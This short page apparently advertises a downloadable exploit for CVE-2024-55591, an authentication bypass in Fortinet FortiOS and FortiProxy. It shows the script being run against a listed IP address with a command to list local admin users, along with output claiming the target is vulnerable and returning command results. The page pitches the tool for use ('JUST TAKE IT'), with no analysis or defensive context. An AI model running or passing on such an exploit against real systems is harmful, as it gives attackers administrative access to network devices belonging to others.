Exploit for Authentication Bypass Using an Alternate Path or Channel in Fortinet FortiProxy
Description

CVE-2024-55591: FortiOS Authentication Bypass

If you’re reading this, you most likely know what we’re talking about.

Download – JUST TAKE IT

Detection in Action

```
python3 exp.py --host 192.104.119.11 --port 443 --command "show user local" --ssl

exp.py
(*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) POC
CVEs: [CVE-2024-55591]

[*] Checking if target is a FortiOS Management interface
[*] Target is confirmed as a FortiOS Management interface
[*] Target is confirmed as vulnerable to CVE-2024-55591, proceeding with exploitation
Output from server: �m"watchTowr" "admin" "watchTowr" "super_admin" "watchTowr" "watchTowr" [13.37.13.37]:1337 [13.37.13.37]:1337
Output from server: � get system status
Output from server: �~�FAKESERIAL #…
```
